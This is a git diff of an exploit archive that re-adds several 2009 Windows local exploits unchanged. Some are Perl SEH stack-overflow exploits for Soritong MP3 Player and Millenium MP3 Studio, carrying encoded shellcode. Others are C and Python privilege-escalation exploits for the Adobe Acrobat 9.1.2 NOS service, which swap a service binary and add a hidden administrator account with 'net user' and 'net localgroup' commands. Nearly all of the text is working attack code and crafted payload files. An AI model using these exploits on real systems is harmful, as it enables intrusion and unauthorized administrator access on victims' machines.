+"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48". 
+"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43". +"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". +"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b". +"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37". +"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49". +"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46". +"\x4e\x36\x43\x46\x42\x50\x5a"; +my $junk = "\x41" x 236; +my $nseh = "\xEB\x06\x90\x90"; +my $seh = "\xB8\x15\xD1\x72"; +my $junk2 = "\x90" x 2000; +open(myfile,'>>UI.TXT'); +print myfile $junk.$nseh.$seh.$shellcode.$junk2; + +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + # Author : SkuLL-HacKeR + # Home : www.Skull-hackeR.NeT + # GreetZ : PrOF.SELLiM , ThE X-HaCkEr , Amine-vb # : Str0ke + # Contact : SkuLL--HacKeR@HotmaiL.CoM + +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # +# END.. +# ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * + +# milw0rm.com [2009-07-20] diff --git a/platforms/windows/local/9216.pl b/platforms/windows/local/9216.pl index cc9c79b79..283bc1085 100755 --- a/platforms/windows/local/9216.pl +++ b/platforms/windows/local/9216.pl 
@@ -1,72 +1,72 @@ - ###################################################### - #-------------------- ~~> SkuLL-HacKeR <~~ -----------------# - #################################################### - -#!/usr/bin/perl -#[+] Bug : Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH) -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". -"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37". -"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48". -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48". -"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43". -"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". -"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b". -"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37". -"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49". -"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46". 
-"\x4e\x36\x43\x46\x42\x50\x5a"; -my $junk = "\x41" x 584; -my $nseh = "\xEB\x06\x90\x90"; -my $seh = "\xE8\x8D\x01\x10"; # universall adress -my $junk2 = "\x90" x 1000; -open(myfile,'>>UI.TXT'); -print myfile $junk.$nseh.$seh.$shellcode.$junk2; - -print $payload; - -############################################## - -# Author : SkuLL-HacKeR -# Home : WwW.Sec-ArT.CoM/cc -# GreetZ : ~~> etc ............. - -** -*** -*** -*** -****** -***** -**** -*** -** -* - - - l - l - V - -# By SkuLL-HACkeR - - ^ - l - l - - - -############################################## - -# milw0rm.com [2009-07-20] + ###################################################### + #-------------------- ~~> SkuLL-HacKeR <~~ -----------------# + #################################################### + +#!/usr/bin/perl +#[+] Bug : Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH) +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". +"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37". +"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48". +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48". +"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43". 
+"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". +"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b". +"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37". +"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49". +"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46". +"\x4e\x36\x43\x46\x42\x50\x5a"; +my $junk = "\x41" x 584; +my $nseh = "\xEB\x06\x90\x90"; +my $seh = "\xE8\x8D\x01\x10"; # universall adress +my $junk2 = "\x90" x 1000; +open(myfile,'>>UI.TXT'); +print myfile $junk.$nseh.$seh.$shellcode.$junk2; + +print $payload; + +############################################## + +# Author : SkuLL-HacKeR +# Home : WwW.Sec-ArT.CoM/cc +# GreetZ : ~~> etc ............. + +** +*** +*** +*** +****** +***** +**** +*** +** +* + + + l + l + V + +# By SkuLL-HACkeR + + ^ + l + l + + + +############################################## + +# milw0rm.com [2009-07-20] diff --git a/platforms/windows/local/9223.txt b/platforms/windows/local/9223.txt index 089937ee6..35e79a739 100755 --- a/platforms/windows/local/9223.txt +++ b/platforms/windows/local/9223.txt 
@@ -1,72 +1,72 @@ -/* -alwaysdirtyneverclean.c -AKA -Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) -BY -Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 -*********************************************************************************************************** -I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the -brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting -improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2) -isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically -use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just -the first time though). Change the values as needed, compile and run. Things could be more or less silent, -lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :) - -Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated) - -But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time. 
-*********************************************************************************************************** -alwaysdirtyneverclean.c -*/ - -#include -#include - -#define DEFAULT_TARGET "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe" -#define DEFAULT_BACKUP "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak" -#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe" -//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe" - -int main(int argc, char *argv[]) -{ - - MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP); - CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE); - // shakee and bakeee - - return 0; - -} -///////////////////////////////////// cut ///////////////////////////////////// - -/* -bin.c -FROM -Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) -BY -Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 -*/ - -#include -#include - -#define CMD "C:\\WINDOWS\\system32\\cmd.exe" -#define ONE "/C net user adobe pwned /add" -#define TWO "/C net localgroup administrators adobe /add" - -int main(int argc, char *argv[]) -{ - -STARTUPINFO si = {sizeof(STARTUPINFO)}; -PROCESS_INFORMATION pi; - - CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); - CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); - // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood - - return 0; - -} - -# milw0rm.com [2009-07-21] +/* +alwaysdirtyneverclean.c +AKA +Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) +BY +Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 +*********************************************************************************************************** +I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the +brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting +improper permissions is fun. A few notes are in order though. 
The getPlus service (that I tested, via 9.1.2) +isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically +use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just +the first time though). Change the values as needed, compile and run. Things could be more or less silent, +lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :) + +Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated) + +But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time. +*********************************************************************************************************** +alwaysdirtyneverclean.c +*/ + +#include +#include + +#define DEFAULT_TARGET "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe" +#define DEFAULT_BACKUP "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak" +#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe" +//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe" + +int main(int argc, char *argv[]) +{ + + MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP); + CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE); + // shakee and bakeee + + return 0; + +} +///////////////////////////////////// cut ///////////////////////////////////// + +/* +bin.c +FROM +Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) +BY +Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 +*/ + +#include +#include + +#define CMD "C:\\WINDOWS\\system32\\cmd.exe" +#define ONE "/C net user adobe pwned /add" +#define TWO "/C net localgroup administrators adobe /add" + +int main(int argc, char *argv[]) +{ + +STARTUPINFO si = {sizeof(STARTUPINFO)}; +PROCESS_INFORMATION pi; + + CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); + CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); + // 
mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood + + return 0; + +} + +# milw0rm.com [2009-07-21] diff --git a/platforms/windows/local/9272.py b/platforms/windows/local/9272.py index f51253bac..c72a64ee3 100755 --- a/platforms/windows/local/9272.py +++ b/platforms/windows/local/9272.py 
@@ -1,49 +1,49 @@ -#!/usr/bin/env python -################################################################################## -# -# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit -# Coded By: Dr_IDE -# Discovered by: Nine:Situations:Group -# Tested On: Windows XP SP2, Requires NOS Package Installed -# Usage: python Dr_IDE-Adobe_912.py -# -################################################################################## - -import os, subprocess - -# -# Should probably have a try block around this as not every install -# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to -# play around with it. -# -# This is a super lame way to do this but it makes it more educational. -evil = "echo *************************************************************\n" -evil += "echo *\n" -evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n" -evil += "echo * Coded By: Dr_IDE\n" -evil += "echo * Discovered By: Nine:Situations:Group\n" -evil += "echo * Tested On: Windows XP SP2\n" -evil += "echo *\n" -evil += "echo *************************************************************\n" -evil += "echo This will add user Dr_IDE:password to the Admin Group\n" -evil += "cd C:\\Program Files\\NOS\\bin\n" -evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n" -evil += "copy /Y %systemroot%\\system32\\cmd.exe\n" -evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n" -evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n" -evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n" -evil += "exit" - -f1 = open('Dr_IDE-Adobe.bat','w'); -f1.write(evil); -f1.close(); - -# Here are two ways to execute this exploit. If you leave both commented just the batch file is created. 
- -# Silent Way - This should be more stealthy -#retval = subprocess.call("Dr_IDE-Adobe.bat"); - -# Louder Way - On some systems this will probably open a DOS window -#retval = os.system("Dr_IDE-Adobe.bat"); - -# milw0rm.com [2009-07-27] +#!/usr/bin/env python +################################################################################## +# +# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit +# Coded By: Dr_IDE +# Discovered by: Nine:Situations:Group +# Tested On: Windows XP SP2, Requires NOS Package Installed +# Usage: python Dr_IDE-Adobe_912.py +# +################################################################################## + +import os, subprocess + +# +# Should probably have a try block around this as not every install +# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to +# play around with it. +# +# This is a super lame way to do this but it makes it more educational. +evil = "echo *************************************************************\n" +evil += "echo *\n" +evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n" +evil += "echo * Coded By: Dr_IDE\n" +evil += "echo * Discovered By: Nine:Situations:Group\n" +evil += "echo * Tested On: Windows XP SP2\n" +evil += "echo *\n" +evil += "echo *************************************************************\n" +evil += "echo This will add user Dr_IDE:password to the Admin Group\n" +evil += "cd C:\\Program Files\\NOS\\bin\n" +evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n" +evil += "copy /Y %systemroot%\\system32\\cmd.exe\n" +evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n" +evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n" +evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n" +evil += "exit" + +f1 = open('Dr_IDE-Adobe.bat','w'); +f1.write(evil); +f1.close(); + +# Here are two ways to execute this exploit. If you leave both commented just the batch file is created. 
+ +# Silent Way - This should be more stealthy +#retval = subprocess.call("Dr_IDE-Adobe.bat"); + +# Louder Way - On some systems this will probably open a DOS window +#retval = os.system("Dr_IDE-Adobe.bat"); + +# milw0rm.com [2009-07-27] diff --git a/platforms/windows/local/9286.pl b/platforms/windows/local/9286.pl index 8281235a6..0cef4880e 100755 --- a/platforms/windows/local/9286.pl +++ b/platforms/windows/local/9286.pl 
@@ -1,84 +1,84 @@ -# -# [+] Vulnerability : (.mpf /.m3u File) Local Stack Overflow Exploit (SEH) #1 -# [+] Product : Millenium MP3 Studio -# [+] Versions affected : v1.0 -# [+] Download : http://www.software112.com/products/mp3-millennium+download.html -# [+] Method : / -# [+] Tested on : Windows XP SP3 En -# [+] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com -# [+] Greetz to : Saumil & SK :-) -# ----------------------------------------------------------------------------- -# MMMMM~. -# MMMMM?. -# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. -# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: -# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM: -# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: -# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: -# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: -# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: -# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: -# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. -# eip hunters -# ----------------------------------------------------------------------------- -# -# Script provided for educational purposes only. -# -# -# -my $junk = "http://"; -#$junk=$junk."\xcc"; -# real shellcode, will be put at ebp-1027 -# windows/exec - 303 bytes -# http://www.metasploit.com -# Encoder: x86/alpha_upper -# EXITFUNC=seh, CMD=calc -my $shellcode2="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" . -"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . -"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . -"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . -"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" . -"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" . 
-"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" . -"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" . -"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" . -"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" . -"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" . -"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" . -"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" . -"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" . -"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" . -"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" . -"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" . -"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" . -"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" . -"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" . -"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" . -"\x31\x42\x4c\x45\x33\x45\x50\x41\x41"; -$junk = $junk.$shellcode2."A" x (4099-length($shellcode2)); - -my $ret= pack('V',0x770CA3E7); #eip, jmp esp from comres.dll -my $nseh = "\xeb\x06\x90\x90"; #jump 6 -my $seh = pack('V',0x1001FF41); #pop pop ret from xaudio.dll - -#jumpcode -my $shellcode="\xe9\xf4\xef\xff\xff"; #jump to 0x00124d55 (ebp-1027) #hardcoded, sorry... not enough time -# If address is different on your system, then change the jumpcode. 
-# You have 20 bytes at your disposal (to jump to ebp-1027 :-) ) -$shellcode=$shellcode."A"x15; -# -# -my $rest="\x00" x 10; -# -# -print "[+] Writing exploit file c0d3rsploit.m3u\n"; -open (myfile,">c0d3rsploit.m3u"); -print myfile $junk.$ret.$shellcode.$rest; -close (myfile); -print "[+] File written\n"; - - -# -# - -# milw0rm.com [2009-07-28] +# +# [+] Vulnerability : (.mpf /.m3u File) Local Stack Overflow Exploit (SEH) #1 +# [+] Product : Millenium MP3 Studio +# [+] Versions affected : v1.0 +# [+] Download : http://www.software112.com/products/mp3-millennium+download.html +# [+] Method : / +# [+] Tested on : Windows XP SP3 En +# [+] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com +# [+] Greetz to : Saumil & SK :-) +# ----------------------------------------------------------------------------- +# MMMMM~. +# MMMMM?. +# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. +# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: +# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM: +# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: +# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: +# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: +# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: +# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: +# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. +# eip hunters +# ----------------------------------------------------------------------------- +# +# Script provided for educational purposes only. +# +# +# +my $junk = "http://"; +#$junk=$junk."\xcc"; +# real shellcode, will be put at ebp-1027 +# windows/exec - 303 bytes +# http://www.metasploit.com +# Encoder: x86/alpha_upper +# EXITFUNC=seh, CMD=calc +my $shellcode2="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" . 
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . +"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . +"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . +"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" . +"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" . +"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" . +"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" . +"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" . +"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" . +"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" . +"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" . +"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" . +"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" . +"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" . +"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" . +"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" . +"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" . +"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" . +"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" . +"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" . +"\x31\x42\x4c\x45\x33\x45\x50\x41\x41"; +$junk = $junk.$shellcode2."A" x (4099-length($shellcode2)); + +my $ret= pack('V',0x770CA3E7); #eip, jmp esp from comres.dll +my $nseh = "\xeb\x06\x90\x90"; #jump 6 +my $seh = pack('V',0x1001FF41); #pop pop ret from xaudio.dll + +#jumpcode +my $shellcode="\xe9\xf4\xef\xff\xff"; #jump to 0x00124d55 (ebp-1027) #hardcoded, sorry... not enough time +# If address is different on your system, then change the jumpcode. 
+# You have 20 bytes at your disposal (to jump to ebp-1027 :-) ) +$shellcode=$shellcode."A"x15; +# +# +my $rest="\x00" x 10; +# +# +print "[+] Writing exploit file c0d3rsploit.m3u\n"; +open (myfile,">c0d3rsploit.m3u"); +print myfile $junk.$ret.$shellcode.$rest; +close (myfile); +print "[+] File written\n"; + + +# +# + +# milw0rm.com [2009-07-28] diff --git a/platforms/windows/local/9298.pl b/platforms/windows/local/9298.pl index 7319246ea..37ce2b7ed 100755 --- a/platforms/windows/local/9298.pl +++ b/platforms/windows/local/9298.pl 
@@ -1,89 +1,89 @@
-#
-# [+] Vulnerability : .m3u File Local Stack Overflow Exploit (SEH) Full Rewrite
-# [+] Product : Millenium MP3 Studio
-# [+] Versions affected : v1.0
-# [+] Download : http://www.software112.com/products/mp3-millennium+download.html
-# [+] Method : seh
-# [+] Tested on : Windows XP SP3 En
-# [+] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com
-# [+] Greetz to : Saumil & SK
-# [+] Note : sorry for the previous version, that was a real mess
-# I mixed up 2 sploits...
-# This one should be a lot better
-# -----------------------------------------------------------------------------
-# MMMMM~.
-# MMMMM?.
-# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
-# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
-# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
-# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
-# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
-# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
-# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
